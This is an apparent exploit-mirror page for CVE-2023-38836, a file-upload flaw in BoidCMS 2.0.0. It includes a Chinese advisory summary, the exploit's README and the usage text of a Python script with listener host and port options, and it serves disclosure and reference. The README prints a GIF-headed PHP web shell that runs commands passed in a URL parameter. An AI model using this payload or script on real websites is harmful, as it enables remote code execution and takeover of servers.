CVE-2023-38836 PoC — BoidCMS 代码问题漏洞

Source

https://github.com/1337kid/CVE-2023-38836

Associated Vulnerability

Title:BoidCMS 代码问题漏洞 (CVE-2023-38836)
Description:BoidCMS是一个免费的开源平面文件 CMS，用于构建简单的网站和博客，使用 PHP 开发并使用 JSON 作为数据库。 BoidCMS v.2.0.0版本存在代码问题漏洞，该漏洞源于允许远程攻击者通过 GIF 标头组件执行任意代码。

Description

Exploit for file upload vulnerability in BoidCMS version <=2.0.0

Readme

# CVE-2023-38836 Exploit
File Upload vulnerability in BoidCMS v.2.0.0 allows an authenticated attacker to upload a file with dangerous type (CWE-434).
<br/>
To exploit, an attacker could add a GIF header to bypass MIME type checks.
```php
GIF89a;
<?php system($_GET["cmd"]); ?>
```

## Usage
```
usage: CVE-2023-38836.py [-h] [-u URL] [-U USER] [-P PASSWD] [-l LHOST] [-p LPORT]

Exploit for CVE-2023-38836

options:
  -h, --help            show this help message and exit
  -u URL, --url URL     website url
  -U USER, --user USER  admin username
  -P PASSWD, --passwd PASSWD
                        admin password
  -l LHOST, --lhost LHOST
                        listening host
  -p LPORT, --lport LPORT
                        listening port
```

![](img.png)

File Snapshot


 [4.0K]  /data/pocs/8dfe966cb933a91a54082a88bc284a008e3b591a
├── [2.3K]  CVE-2023-38836.py
├── [ 83K]  img.png
├── [ 34K]  LICENSE
└── [ 764]  README.md

0 directories, 4 files

Shenlong Bot has cached this for you

Remarks

1. It is advised to access via the original source first.

2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).

3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.

Goal Reached Thanks to every supporter — we hit 100%!